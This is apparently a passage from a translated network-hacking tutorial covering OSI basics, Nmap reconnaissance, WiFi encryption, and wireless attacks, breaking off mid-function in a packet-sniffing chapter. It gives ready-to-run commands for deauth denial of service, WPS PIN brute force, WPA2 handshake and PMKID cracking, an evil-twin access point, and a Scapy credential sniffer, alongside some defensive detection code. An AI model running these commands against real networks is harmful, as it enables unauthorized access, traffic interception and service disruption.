Network Hacking & Wireless Security

Complete Network Guide for Cyber Security

From OSI Model to WiFi Security — the only complete Bengali resource for Network Security. After reading this, no other book or course is needed.

🌐 OSI/TCP-IP 🔍 Reconnaissance 📶 WiFi Security 🎭 MITM Attack 👃 Packet Sniffing 🔒 Firewall Bypass 🛡️ Network Defense 🔧 Wireshark 📡 Aircrack-ng
root@kali:~# iwconfig
wlan0 IEEE 802.11 Mode:Monitor
root@kali:~# airodump-ng wlan0mon
BSSID PWR Beacons #Data CH MB ENC
AA:BB:CC:DD:EE:FF -45 120 45 6 54 WPA2
[*] Target network found...
📋 Table of Contents
01. Network Fundamentals — OSI & TCP/IP
OSI 7 Layer, TCP/IP, Protocols, Ports, IP Addressing, Subnetting
02. Network Reconnaissance
Nmap, Passive Recon, OSINT, DNS Enumeration, Service Detection
03. Wireless Security Protocols
WEP, WPA, WPA2, WPA3, 802.11 Standards, Encryption Mechanisms
04. Wireless Attacks
Monitor Mode, Handshake Capture, Deauth, Evil Twin, WPS Attack
05. Packet Sniffing & Analysis
Wireshark, tcpdump, Scapy, Traffic Analysis, Credential Capture
06. MITM — Man-in-the-Middle
ARP Spoofing, DNS Spoofing, SSL Strip, Bettercap
07. Network Service Attacks
FTP/SSH/Telnet/SMB/RDP Brute Force, Exploitation
08. Firewall & IDS Evasion
Firewall Rules, Port Knocking, Tunneling, Fragmentation
09. VPN & Tunneling
SSH Tunneling, Proxychains, Tor, OpenVPN, WireGuard
10. Network Defense & Hardening
Firewall Setup, IDS/IPS, Network Segmentation, WiFi Hardening
11. Tools Reference
Nmap, Wireshark, Aircrack-ng, Bettercap, Metasploit, netdiscover
12. Real-World Lab Scenarios
Home Lab Setup, Practice Networks, CTF Network Challenges
Chapter 01
🌐 Network Fundamentals — OSI & TCP/IP
This foundation is mandatory to understand network hacking

🏗️ OSI Model — 7 Layers

The OSI (Open Systems Interconnection) Model is the theoretical framework for network communication. Each layer can be attacked differently. Knowing every layer is mandatory as a security professional.

# | Layer | Examples
7 | Application | HTTP, HTTPS, FTP, SSH, DNS, SMTP, SNMP
6 | Presentation | SSL/TLS, Encryption, Encoding (ASCII, JPEG)
5 | Session | NetBIOS, RPC, Session management
4 | Transport | TCP (reliable), UDP (fast), Port numbers
3 | Network | IP, ICMP, OSPF, BGP — Routing
2 | Data Link | Ethernet, MAC address, ARP, Switch
1 | Physical | Cables, WiFi signals, Hub, Repeater

⚔️ Attacks per Layer

  • L7: SQL Injection, XSS, DNS Poison
  • L6: SSL Strip, Certificate Spoof
  • L5: Session Hijack
  • L4: SYN Flood, Port Scan
  • L3: IP Spoofing, ICMP Flood
  • L2: ARP Spoof, MAC Flood
  • L1: Physical Tap, Jamming

🛡️ Defense per Layer

  • L7: WAF, Input Validation
  • L6: Strong TLS (1.3), HSTS
  • L5: Session Timeout, Re-auth
  • L4: Rate Limiting, Firewall
  • L3: Ingress Filtering, ACL
  • L2: DAI, Port Security
  • L1: Physical Security

🔄 TCP/IP Model & Protocols

Layer | Protocol | Port | Purpose | Attack Vector
Application | HTTP | 80 | Web traffic | Sniffing, SQLi, XSS
Application | HTTPS | 443 | Encrypted web | SSL Strip, Cert spoof
Application | FTP | 21 | File transfer | Brute force, Sniff
Application | SSH | 22 | Secure shell | Brute force, Key theft
Application | Telnet | 23 | Remote shell (insecure) | Plaintext sniffing
Application | DNS | 53 | Name resolution | DNS Spoofing, Cache Poison
Application | SMTP | 25 | Email send | Relay abuse, Phishing
Application | SMB | 445 | File sharing (Windows) | EternalBlue, Pass-the-Hash
Application | RDP | 3389 | Remote Desktop | Brute force, BlueKeep
Transport | TCP | - | Reliable connection | SYN flood, RST inject
Transport | UDP | - | Fast, connectionless | UDP flood, Amplification
Network | ICMP | - | Ping, Error messages | Ping flood, Smurf attack
Network | ARP | - | IP→MAC resolution | ARP Spoofing (MITM)

🔢 IP Addressing & Subnetting

# IP Address Classes
Class A: 1.0.0.0 - 126.255.255.255 (Large networks)
Class B: 128.0.0.0 - 191.255.255.255 (Medium networks)
Class C: 192.0.0.0 - 223.255.255.255 (Small networks)

# Private IP Ranges (RFC 1918)
10.0.0.0/8       # Class A private — 10.x.x.x
172.16.0.0/12    # Class B private — 172.16.x.x to 172.31.x.x
192.168.0.0/16   # Class C private — 192.168.x.x (home networks)

# Recognising subnet masks
/24 = 255.255.255.0   → 254 hosts (192.168.1.0/24)
/16 = 255.255.0.0     → 65534 hosts
/8  = 255.0.0.0       → 16777214 hosts
/30 = 255.255.255.252 → 2 hosts (point-to-point links)

# Find your own IP/network
$ ip addr show
$ ip route show
$ hostname -I

# Calculate a network range (Python)
import ipaddress

net = ipaddress.ip_network("192.168.1.0/24")
print(f"Network: {net.network_address}")
print(f"Broadcast: {net.broadcast_address}")
print(f"Hosts: {net.num_addresses - 2}")
for ip in list(net.hosts())[:5]:
    print(ip)

🤝 TCP Three-Way Handshake

TCP connections are established via this 3-step process. Understanding it is essential for understanding port scanners and firewall bypass.

Client                      Server
  |                           |
  | ——— SYN ————————————→     |   Client: "I want to connect" (seq=100)
  | ←—— SYN-ACK —————————     |   Server: "OK, are you ready?" (seq=200, ack=101)
  | ——— ACK ————————————→     |   Client: "Yes, ready!" (ack=201)
  |                           |
  | [Connection Established]  |

# Port scanners use this principle:
# Send SYN → SYN-ACK received = OPEN
# Send SYN → RST received     = CLOSED
# Send SYN → no reply         = FILTERED (firewall)

# Nmap SYN scan (stealth: does not complete the 3rd step)
$ nmap -sS target_ip   # SYN scan (root needed)
$ nmap -sT target_ip   # Full TCP connect scan
$ nmap -sU target_ip   # UDP scan

📋 Important Network Commands

# View network interfaces
$ ip addr show        # IP addresses
$ ip link show        # Interface status
$ ifconfig            # Legacy (still works)
$ iwconfig            # Wireless interfaces

# Routing table
$ ip route show
$ route -n

# Active connections and ports
$ ss -tlnp            # Listening TCP ports
$ ss -tulnp           # TCP + UDP
$ netstat -tulnp      # Legacy netstat

# ARP table (MAC addresses)
$ arp -a
$ ip neigh show

# DNS lookup
$ nslookup google.com
$ dig google.com A
$ dig google.com MX
$ host google.com

# Connectivity test
$ ping -c 4 8.8.8.8
$ traceroute 8.8.8.8  # Route trace
$ mtr 8.8.8.8         # Live traceroute

# View firewall rules
$ iptables -L -n -v
$ nft list ruleset    # nftables (modern)

✅ Chapter 1 Summary

  • Know the 7 OSI layers and which attacks happen at each
  • Memorize the TCP/IP protocols and ports
  • Practice IP addressing and subnet calculation
  • TCP 3-way handshake: the basis of port scanning
  • Use the basic Linux network commands daily
Chapter 02
🔍 Network Reconnaissance
Complete methodology for gathering information about targets

🗺️ Reconnaissance Types

👁️ Passive Recon

Gather information without sending any packets to the target. The target does not know.

  • WHOIS lookup
  • DNS enumeration
  • Google Dorking
  • Shodan search
  • Social media OSINT

Active Recon

Gather information by sending packets to the target. An IDS or firewall may log it.

  • Port scanning (Nmap)
  • Ping sweep
  • Banner grabbing
  • Service detection
  • OS fingerprinting

🗺️ Nmap — The King of Scanners

# ════ HOST DISCOVERY ════
$ nmap -sn 192.168.1.0/24                 # Ping sweep (live hosts)
$ nmap -sn -PS22,80,443 10.0.0.0/24       # TCP SYN ping
$ nmap -PR 192.168.1.0/24                 # ARP ping (local network)

# ════ PORT SCANNING ════
$ nmap 192.168.1.1                        # Top 1000 ports
$ nmap -p- 192.168.1.1                    # All 65535 ports
$ nmap -p 22,80,443,3306 192.168.1.1      # Specific ports
$ nmap -p 1-1024 192.168.1.1              # Port range

# ════ SCAN TYPES ════
$ nmap -sS 192.168.1.1                    # SYN scan (stealth, root)
$ nmap -sT 192.168.1.1                    # TCP connect (no root needed)
$ nmap -sU 192.168.1.1                    # UDP scan
$ nmap -sA 192.168.1.1                    # ACK scan (firewall mapping)
$ nmap -sN 192.168.1.1                    # NULL scan (no flags)
$ nmap -sX 192.168.1.1                    # Xmas scan (FIN+PSH+URG)
$ nmap -sF 192.168.1.1                    # FIN scan

# ════ SERVICE & VERSION DETECTION ════
$ nmap -sV 192.168.1.1                    # Service version
$ nmap -sV --version-intensity 9          # Aggressive version detect
$ nmap -O 192.168.1.1                     # OS detection
$ nmap -A 192.168.1.1                     # All: OS+version+script+traceroute

# ════ NSE SCRIPTS ════
$ nmap --script=banner 192.168.1.1        # Banner grabbing
$ nmap --script=vuln 192.168.1.1          # Vulnerability scan
$ nmap --script=http-enum 192.168.1.1     # HTTP enumeration
$ nmap --script=smb-vuln* 192.168.1.1     # SMB vulnerabilities
$ nmap --script=ftp-anon 192.168.1.1      # Anonymous FTP
$ nmap --script=ssh-brute 192.168.1.1     # SSH brute force
$ nmap --script=dns-brute domain.com      # DNS brute force

# ════ SPEED & TIMING ════
$ nmap -T0 target                         # Paranoid (very slow, IDS evasion)
$ nmap -T1 target                         # Sneaky
$ nmap -T2 target                         # Polite
$ nmap -T3 target                         # Normal (default)
$ nmap -T4 target                         # Aggressive (fast)
$ nmap -T5 target                         # Insane (very fast, may miss)

# ════ EVASION ════
$ nmap -D RND:10 192.168.1.1              # Decoy scan
$ nmap -S spoofed_ip 192.168.1.1          # Source IP spoof
$ nmap -f target                          # Fragment packets
$ nmap --data-length 200 target           # Random data padding

# ════ OUTPUT ════
$ nmap -oN scan.txt target                # Normal output
$ nmap -oX scan.xml target                # XML output
$ nmap -oG scan.grep target               # Grepable output
$ nmap -oA scan target                    # All formats

🔎 DNS Enumeration

# Basic DNS lookup
$ dig target.com ANY     # All records
$ dig target.com A       # IPv4 address
$ dig target.com AAAA    # IPv6 address
$ dig target.com MX      # Mail server
$ dig target.com NS      # Name servers
$ dig target.com TXT     # SPF, DKIM, verification
$ dig target.com SOA     # Start of authority
$ dig -x 8.8.8.8         # Reverse lookup (PTR)

# Attempt a zone transfer (misconfigured DNS)
$ dig axfr target.com @ns1.target.com
$ host -l target.com ns1.target.com

# Subdomain Brute Force
$ gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt
$ dnsenum target.com
$ dnsrecon -d target.com -t brt -D /usr/share/wordlists/subdomains.txt
$ amass enum -d target.com   # Passive + active

# Fierce — automated DNS recon
$ fierce --domain target.com

🌐 Network Discovery Tools

# netdiscover — ARP based host discovery
$ netdiscover -r 192.168.1.0/24      # Active scan
$ netdiscover -p                     # Passive (just listen)
$ netdiscover -i eth0 -r 10.0.0.0/24

# arp-scan
$ arp-scan --localnet
$ arp-scan -I eth0 192.168.1.0/24

# masscan — ultra-fast internet scanner
$ masscan -p80,443 192.168.1.0/24 --rate=1000
$ masscan -p0-65535 10.0.0.0/8 --rate=10000

# nbtscan — NetBIOS scan (Windows networks)
$ nbtscan 192.168.1.0/24

# Shodan CLI (internet-wide)
$ shodan search "apache 2.4" country:BD
$ shodan host 8.8.8.8
$ shodan search port:22 default password

✅ Chapter 2 Summary

  • Passive vs Active recon: when to use which
  • Memorize all the important Nmap flags
  • DNS zone transfer: all subdomains from a misconfigured server
  • netdiscover/arp-scan: find live hosts on the local network
Chapter 03
📶 Wireless Security Protocols
WEP to WPA3 — complete history and weaknesses of WiFi encryption

📡 802.11 WiFi Standards

Standard | Name | Frequency | Max Speed | Range
802.11b | WiFi 1 | 2.4 GHz | 11 Mbps | 35m indoor
802.11a | WiFi 2 | 5 GHz | 54 Mbps | 35m indoor
802.11g | WiFi 3 | 2.4 GHz | 54 Mbps | 38m indoor
802.11n | WiFi 4 | 2.4/5 GHz | 600 Mbps | 70m indoor
802.11ac | WiFi 5 | 5 GHz | 3.5 Gbps | 35m indoor
802.11ax | WiFi 6 | 2.4/5/6 GHz | 9.6 Gbps | Indoor+outdoor

🔓 WEP — Wired Equivalent Privacy (Broken)

WEP was the first WiFi security standard (1997). It uses the RC4 cipher but with only a 24-bit IV (Initialization Vector), so the same IVs repeat and the entire encryption breaks.

WEP Weaknesses

  • The IV is only 24 bits, so collisions are inevitable
  • Static key: once it is known, everything can be decrypted
  • RC4 keystream reuse vulnerability
  • Can be cracked with only ~50,000 packets
  • Cracked within minutes with aircrack-ng

🔧 WEP Crack Tool

  • aircrack-ng — primary tool
  • aireplay-ng — packet injection
  • airodump-ng — capture
  • WEP networks are almost nonexistent today
  • ⛔ Deprecated since 2003

🔐 WPA — WiFi Protected Access

WPA (2003) replaced WEP. It uses TKIP (Temporal Key Integrity Protocol), which generates a different key for each packet. It is still weaker than WPA2.

WPA Authentication Modes:

WPA-Personal (WPA-PSK)
  └─ Pre-Shared Key — home/small office
  └─ The PMK (Pairwise Master Key) is derived from the password
  └─ Authenticates with the 4-way handshake
  └─ The handshake can be captured and cracked offline

WPA-Enterprise (WPA-802.1X)
  └─ Uses a RADIUS server
  └─ Separate credentials for each user
  └─ Used in corporate networks
  └─ Much harder to crack

WPA Encryption:
  TKIP → RC4-based, per-packet key mixing
  CCMP → AES-based (optional in WPA, mandatory in WPA2)

🔒 WPA2 — Current Standard

WPA2 (2004) is the most widely used WiFi security protocol. It uses AES-CCMP encryption, which is very strong. The primary attack vector is capturing the 4-way handshake for an offline dictionary/brute force attack.

WPA2 4-Way Handshake Process:

AP (Router)                        Client
    |                                |
    | ←──── Association req ────     |   Client joins network
    | ──── Association resp ───→     |
    |                                |
    | ─── MSG1: ANonce ─────────→    |   AP sends random nonce
    | ←── MSG2: SNonce+MIC ─────     |   Client sends nonce+MIC
    | ─── MSG3: GTK+MIC ────────→    |   AP sends group key
    | ←── MSG4: ACK ────────────     |   Client confirms
    |                                |
    |   [Encrypted communication]    |

# Attack: capturing MSG1+MSG2 (or MSG2+MSG3) is enough
# PTK (Pairwise Transient Key) = PBKDF2(PSK, SSID, ANonce, SNonce, MAC)
# The MIC (Message Integrity Code) verifies whether the password is correct

ℹ️ PMKID Attack (2018): Without capturing a handshake, the password can be cracked directly from the AP's PMKID. No client needs to be present. Use hcxdumptool to capture the PMKID.

🛡️ WPA3 — Latest & Most Secure

Feature | WPA2 | WPA3
Key Exchange | PSK (4-way handshake) | SAE (Dragonfly) — dictionary attack resist
Forward Secrecy | ❌ No | ✅ Yes (old traffic stays safe)
Offline Dictionary Attack | ✅ Possible | ❌ Not possible (online only)
PMKID Attack | ✅ Possible | ❌ Not possible
Open Network Encryption | ❌ No | ✅ OWE (Opportunistic Wireless Encryption)
Enterprise Encryption | 128-bit | 192-bit (CNSA suite)
Known Weakness | Handshake crack | Dragonblood (side-channel, older implementations)

🔑 WPS — WiFi Protected Setup

WPS is a simple connection mechanism using an 8-digit PIN. But the PIN is verified in two halves (4+4 digits), so only ~11,000 combinations need to be tried to find the PIN.

# WPS PIN attack
$ wash -i wlan0mon                         # Find WPS-enabled networks
$ reaver -i wlan0mon -b BSSID -vv          # WPS PIN brute force
$ bully -b BSSID -e ESSID -c CH wlan0mon   # Alternative to reaver

# WPS lock check (3 failed attempts = lock)
$ reaver -i wlan0mon -b BSSID -L           # Ignore locks
$ reaver -i wlan0mon -b BSSID -d 30        # 30s delay between attempts

# PixieDust Attack (offline WPS crack)
$ reaver -i wlan0mon -b BSSID -K 1         # Pixie mode

✅ Chapter 3 Summary

  • WEP → RC4 + 24-bit IV → completely broken
  • WPA → TKIP → handshake captured, then cracked offline
  • WPA2 → AES-CCMP → 4-way handshake + PMKID attack
  • WPA3 → SAE → offline cracking not possible
  • WPS → 8-digit PIN → cracked in ~11,000 tries
Chapter 04
⚔️ Wireless Attacks
Monitor Mode, Handshake Capture, Deauth, Evil Twin — all Wireless Attacks
🚨 Practice only on your own network or authorized lab. Cracking others' WiFi is a crime under the ICT Act in Bangladesh.

📡 Monitor Mode Setup

Monitor Mode means the wireless adapter can capture all packets, not just those of your own network. WiFi attacks are impossible without enabling this.

# A compatible adapter is required (internal WiFi does not work)
# Recommended: Alfa AWUS036ACH, AWUS036NHA, TP-Link TL-WN722N

# Method 1: airmon-ng (easy)
$ airmon-ng check kill        # Kill conflicting processes
$ airmon-ng start wlan0       # Monitor mode ON → creates wlan0mon
$ airmon-ng stop wlan0mon     # Monitor mode OFF

# Method 2: iw (manual)
$ ip link set wlan0 down
$ iw dev wlan0 set type monitor
$ ip link set wlan0 up

# Method 3: iwconfig
$ ifconfig wlan0 down
$ iwconfig wlan0 mode monitor
$ ifconfig wlan0 up

# Verify
$ iwconfig wlan0mon
wlan0mon IEEE 802.11 Mode:Monitor

# Lock to a specific channel
$ iwconfig wlan0mon channel 6
$ iw dev wlan0mon set channel 6

🎯 airodump-ng — Network Discovery

# List all WiFi networks
$ airodump-ng wlan0mon

# What the output shows:
BSSID              PWR  Beacons  #Data  CH  MB   ENC   CIPHER  AUTH  ESSID
AA:BB:CC:DD:EE:FF  -65  234      12     6   54   WPA2  CCMP    PSK   MyNetwork
11:22:33:44:55:66  -80  45       0      11  130  WPA2  CCMP    PSK   Neighbor

# Focus on a specific network
$ airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
#      channel↑    target BSSID↑            output file↑

# Output files created:
# capture-01.cap ← the handshake will be here
# capture-01.csv ← CSV data
# capture-01.kismet.netxml

# Connected clients
STATION            PWR  Rate   Lost  Frames  Probe
FF:EE:DD:CC:BB:AA  -55  54-54  0     45      MyNetwork

💥 Deauthentication Attack

A deauth attack forces a client to disconnect by sending forged deauthentication frames. The 4-way handshake can be captured when the client reconnects.

# Send deauth → client disconnects → reconnects → handshake is captured

# Deauth all clients
$ aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
#     ↑deauth count   ↑target AP BSSID

# Deauth a specific client
$ aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c FF:EE:DD:CC:BB:AA wlan0mon
#                      ↑AP BSSID            ↑Client MAC

# Continuous deauth (DOS)
$ aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF wlan0mon
# 0 = infinite — the client can never connect

# Terminal 1: run airodump (capture mode)
$ airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# Terminal 2: send deauth
$ aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

# Terminal 1 will show: WPA handshake: AA:BB:CC:DD:EE:FF
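The defender's view of the deauth sequence above, as an added example that is not part of the original guide: it flags bursts of deauthentication frames per AP/client pair and records whether an EAPOL handshake followed the burst, which is the moment the passphrase becomes exposed to offline guessing. The frame record layout, thresholds and function names are assumptions, and the sample log is constructed.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
AP = "aa:bb:cc:dd:ee:ff"        # placeholder BSSID used on this page
CLIENT = "ff:ee:dd:cc:bb:aa"    # placeholder client MAC used on this page


def build_sample():
    """Constructed frame log: (time_s, subtype, bssid, client, info).

    info is the reason code for deauth frames and the handshake message
    number for EAPOL frames. Nothing here was captured from a real network.
    """
    frames = [
        # Ordinary, isolated deauths (a client leaving) must not alert.
        (10.0, "deauth", AP, "11:22:33:44:55:66", 3),
        (300.0, "deauth", AP, "11:22:33:44:55:66", 3),
    ]
    # Targeted burst against one client, followed by its reconnect handshake.
    frames += [(500.0 + i * 0.02, "deauth", AP, CLIENT, 7) for i in range(64)]
    frames += [(503.0 + m * 0.01, "eapol", AP, CLIENT, m) for m in (1, 2, 3, 4)]
    # Broadcast burst aimed at every client of the AP.
    frames += [(700.0 + i * 0.05, "deauth", AP, BROADCAST, 7) for i in range(40)]
    return frames


def detect_deauth_floods(frames, threshold=10, window=5.0, reconnect_within=30.0):
    """Return one alert per (bssid, client) pair that saw a deauth burst."""
    recent = defaultdict(deque)   # (bssid, client) -> timestamps inside the window
    bursts = {}                   # (bssid, client) -> alert
    for ts, subtype, bssid, client, _info in sorted(frames):
        if subtype != "deauth":
            continue
        q = recent[(bssid, client)]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            alert = bursts.setdefault((bssid, client), {
                "bssid": bssid,
                "client": client,
                "broadcast": client == BROADCAST,
                "first_seen": q[0],
                "last_seen": ts,
                "peak": 0,
                "handshake_after": False,
            })
            alert["last_seen"] = ts
            alert["peak"] = max(alert["peak"], len(q))

    # A 4-way handshake right after a burst means the reconnect was observable.
    for ts, subtype, bssid, client, _info in frames:
        if subtype != "eapol":
            continue
        for (b, c), alert in bursts.items():
            same_target = c == client or c == BROADCAST
            if b == bssid and same_target and 0 <= ts - alert["last_seen"] <= reconnect_within:
                alert["handshake_after"] = True
    return sorted(bursts.values(), key=lambda a: a["first_seen"])


if __name__ == "__main__":
    for a in detect_deauth_floods(build_sample()):
        kind = "broadcast" if a["broadcast"] else "targeted"
        print(f"{kind} deauth burst on {a['bssid']} -> {a['client']}: "
              f"peak {a['peak']} frames, handshake followed: {a['handshake_after']}")
```

Forged deauthentication frames are rejected when both AP and client use 802.11w Protected Management Frames, which WPA3 makes mandatory.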

🔓 WPA2 Handshake Cracking

# Method 1: aircrack-ng (Dictionary attack)
$ aircrack-ng handshake-01.cap -w /usr/share/wordlists/rockyou.txt
$ aircrack-ng handshake-01.cap -w passwords.txt -e "NetworkName"

# Method 2: hashcat (GPU — much faster!)
# Convert .cap → .hc22000 format
$ hcxpcapngtool -o hash.hc22000 handshake-01.cap

# Crack with hashcat
$ hashcat -m 22000 hash.hc22000 rockyou.txt
$ hashcat -m 22000 hash.hc22000 rockyou.txt -r rules/best64.rule
$ hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d   # 8-digit brute force

# Method 3: PMKID Attack (even when no client is present)
$ hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
$ hcxpcapngtool -o hash.hc22000 pmkid.pcapng
$ hashcat -m 22000 hash.hc22000 rockyou.txt

# Create a custom wordlist
$ crunch 8 8 0123456789 -o 8digit.txt         # 8-digit numbers
$ crunch 8 10 abcdefghijklmnopqrstuvwxyz      # Lowercase 8-10 chars

# hashcat masks
# ?l = lowercase  ?u = uppercase  ?d = digit  ?s = special
$ hashcat -m 22000 hash.hc22000 -a 3 ?l?l?l?l?d?d?d?d   # 4 letters + 4 digits

👿 Evil Twin Attack

Evil Twin means creating a fake AP with the same name as the victim's network. When the victim connects, their traffic flows through us.

# Create a fake AP with hostapd
# /etc/hostapd/fake.conf
interface=wlan0
driver=nl80211
# Name of the target network
ssid=FreeWiFi
hw_mode=g
channel=6
auth_algs=1
ignore_broadcast_ssid=0

$ hostapd /etc/hostapd/fake.conf

# DHCP server setup (dnsmasq)
$ dnsmasq --interface=wlan0 --dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h \
    --no-resolv --server=8.8.8.8

# Enable IP forwarding
$ echo 1 > /proc/sys/net/ipv4/ip_forward
$ iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Automated: hostapd-wpe (WPA Enterprise attack)
$ hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# With airbase-ng (simpler)
$ airbase-ng -a AA:BB:CC:DD:EE:FF -e "TargetSSID" -c 6 wlan0mon

🔧 Wireless Attack Toolkit Summary

Tool | Purpose | Command
airmon-ng | Monitor mode | airmon-ng start wlan0
airodump-ng | Network scan & capture | airodump-ng wlan0mon
aireplay-ng | Packet injection, deauth | aireplay-ng -0 5 -a BSSID wlan0mon
aircrack-ng | WEP/WPA crack (CPU) | aircrack-ng cap.cap -w wordlist
hashcat | WPA crack (GPU, fast) | hashcat -m 22000 hash rockyou.txt
hcxdumptool | PMKID capture | hcxdumptool -i wlan0mon -o out.pcapng
reaver | WPS PIN attack | reaver -i wlan0mon -b BSSID -vv
wash | Find WPS-enabled APs | wash -i wlan0mon
wifite | Automated WiFi attack | wifite
fern-wifi-cracker | GUI WiFi cracker | fern-wifi-cracker

✅ Chapter 4 Summary

  • Monitor mode = the first step of a wireless attack
  • Scan with airodump-ng → deauth with aireplay-ng → handshake capture
  • aircrack-ng (CPU) vs hashcat (GPU): hashcat is much faster
  • PMKID attack = WPA2 crack without a client
  • WPS attack = the PIN is found in ~11,000 tries
  • Evil Twin = intercept the victim's traffic with a fake AP
Chapter 05
👃 Packet Sniffing & Analysis
Wireshark, tcpdump, Scapy — Viewing and analyzing network traffic

🦈 Wireshark — GUI Packet Analyzer

# Start Wireshark
$ wireshark &
$ wireshark -i eth0 &           # Specific interface
$ wireshark -r capture.pcap &   # Open a saved file

═══ DISPLAY FILTERS (most important) ═══

# Protocol filter
http          # HTTP traffic only
dns           # DNS queries only
tcp           # TCP only
udp           # UDP only
icmp          # ICMP (ping)
arp           # ARP packets
ssl or tls    # Encrypted traffic
ftp           # FTP
ssh           # SSH
smb           # SMB file sharing

# IP filter
ip.addr == 192.168.1.1        # Specific IP (src or dst)
ip.src == 192.168.1.100       # Source IP
ip.dst == 8.8.8.8             # Destination IP
ip.addr == 192.168.1.0/24     # Entire subnet

# Port filter
tcp.port == 80                      # TCP port 80
tcp.dstport == 443                  # Destination port
tcp.port == 22 or tcp.port == 80    # Multiple ports

# Content filter
http.request.method == "POST"          # HTTP POST only
http.request.uri contains "login"      # URL contains "login"
frame contains "password"              # Packet contains the word "password"
dns.qry.name contains "google"         # DNS query

# Combination
http and ip.src == 192.168.1.100
tcp.port == 80 and !ip.addr == 192.168.1.1
http.request.method == "POST" and http contains "password"

🖥️ tcpdump — CLI Packet Capture

# Basic capture
$ tcpdump -i eth0                   # Capture on eth0
$ tcpdump -i any                    # All interfaces
$ tcpdump -i eth0 -w output.pcap    # Save to a file
$ tcpdump -r output.pcap            # Read from a file
$ tcpdump -i eth0 -n                # Do not resolve DNS
$ tcpdump -i eth0 -v                # Verbose
$ tcpdump -i eth0 -X                # Hex+ASCII dump
$ tcpdump -i eth0 -c 100            # Stop after capturing 100 packets

# BPF Filters
$ tcpdump -i eth0 host 192.168.1.1               # Specific host
$ tcpdump -i eth0 src 192.168.1.100              # Source IP
$ tcpdump -i eth0 dst 8.8.8.8                    # Dest IP
$ tcpdump -i eth0 port 80                        # Port 80
$ tcpdump -i eth0 tcp port 443                   # TCP port 443
$ tcpdump -i eth0 udp port 53                    # DNS
$ tcpdump -i eth0 net 192.168.1.0/24             # Subnet
$ tcpdump -i eth0 'tcp[tcpflags] == tcp-syn'     # SYN packets only
$ tcpdump -i eth0 not port 22                    # Everything except SSH
$ tcpdump -i eth0 port 80 or port 443            # HTTP + HTTPS

# HTTP credentials capture (unencrypted)
$ tcpdump -i eth0 -A port 80 | grep -E "username|password|pass|login"

# Live display + save
$ tcpdump -i eth0 -w - | tee output.pcap | tcpdump -r -

🐍 Packet Analysis with Scapy

from scapy.all import sniff, rdpcap, IP, TCP, Raw, DNS

# Live sniffing
def packet_handler(pkt):
    if pkt.haslayer(IP):
        src = pkt[IP].src
        dst = pkt[IP].dst

        # HTTP POST → credentials captured
        if pkt.haslayer(TCP) and pkt.haslayer(Raw):
            payload = pkt[Raw].load.decode('utf-8', errors='ignore')
            keywords = ['password', 'passwd', 'user', 'login', 'pwd']
            if any(kw in payload.lower() for kw in keywords):
                print(f"\n[!] CREDENTIALS from {src}:")
                print(payload[:300])

        # Log DNS queries
        if pkt.haslayer(DNS) and pkt[DNS].qr == 0:
            query = pkt[DNS].qd.qname.decode('utf-8', errors='ignore')
            print(f"[DNS] {src} → {query}")

sniff(iface="eth0", prn=packet_handler, store=0,
      filter="tcp port 80 or udp port 53")

# Analyze a .pcap file
packets = rdpcap("capture.pcap")
print(f"Total packets: {len(packets)}")

# Extract HTTP GET/POST requests
for pkt in packets:
    if pkt.haslayer(Raw):
        payload = pkt[Raw].load.decode('utf-8', errors='ignore')
        if 'GET ' in payload or 'POST ' in payload:
            print(f"[HTTP] {payload[:100]}")

🔍 Wireshark Forensics — Real Scenarios

════ Scenario 1: Extract HTTP Credentials ════
Filter: http.request.method == "POST"
→ Packet → Follow → HTTP Stream
→ you will see username=admin&password=secret

════ Scenario 2: Spot DNS Exfiltration ════
Filter: dns.qry.name contains "suspicious.com"
→ An unusually large number of DNS queries = data exfiltration

════ Scenario 3: Detect a Port Scan ════
Filter: tcp.flags.syn == 1 and tcp.flags.ack == 0
→ Many SYNs from the same source = port scan

════ Scenario 4: FTP Credentials ════
Filter: ftp
→ The USER and PASS commands appear in plaintext

════ Scenario 5: Telnet Session ════
Filter: telnet
→ Follow TCP Stream → you will see every keystroke

════ Useful Wireshark Statistics ════
Statistics → Protocol Hierarchy → how much of each protocol
Statistics → Conversations → who is talking to whom
Statistics → Endpoints → list of all IPs/MACs
Statistics → IO Graphs → Traffic graph
Analyze → Expert Information → Errors/warnings
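Scenario 3 automated, as an added example that is not part of the original guide: instead of eyeballing the SYN filter, it counts distinct targets per source inside a time window and checks how many handshakes were ever completed, using the SYN / SYN-ACK / RST semantics from Chapter 1. The record layout, thresholds and function names are assumptions, and the packet records are constructed.

```python
from collections import defaultdict


def build_sample():
    """Constructed records: (time_s, src, dst, sport, dport, flags).

    Flags use tcpdump letters: S=SYN, A=ACK, R=RST.
    """
    pkts = []
    # Normal client: three complete handshakes to one HTTPS server.
    for i in range(3):
        t, cport = 100.0 + i, 50000 + i
        pkts += [
            (t, "10.0.0.20", "10.0.0.5", cport, 443, "S"),
            (t + 0.01, "10.0.0.5", "10.0.0.20", 443, cport, "SA"),
            (t + 0.02, "10.0.0.20", "10.0.0.5", cport, 443, "A"),
        ]
    # Half-open scan: 25 ports in 2.4 s. Open ports answer SYN-ACK and the
    # scanner resets them; closed ports answer RST. The third step never comes.
    for i, port in enumerate(range(20, 45)):
        t = 200.0 + i * 0.1
        pkts.append((t, "10.0.0.66", "10.0.0.5", 40000, port, "S"))
        if port in (22, 25):
            pkts.append((t + 0.01, "10.0.0.5", "10.0.0.66", port, 40000, "SA"))
            pkts.append((t + 0.02, "10.0.0.66", "10.0.0.5", 40000, port, "R"))
        else:
            pkts.append((t + 0.01, "10.0.0.5", "10.0.0.66", port, 40000, "RA"))
    return pkts


def detect_syn_scans(packets, min_targets=15, window=10.0, max_completion=0.2):
    """Flag sources that SYN many (host, port) targets but rarely finish."""
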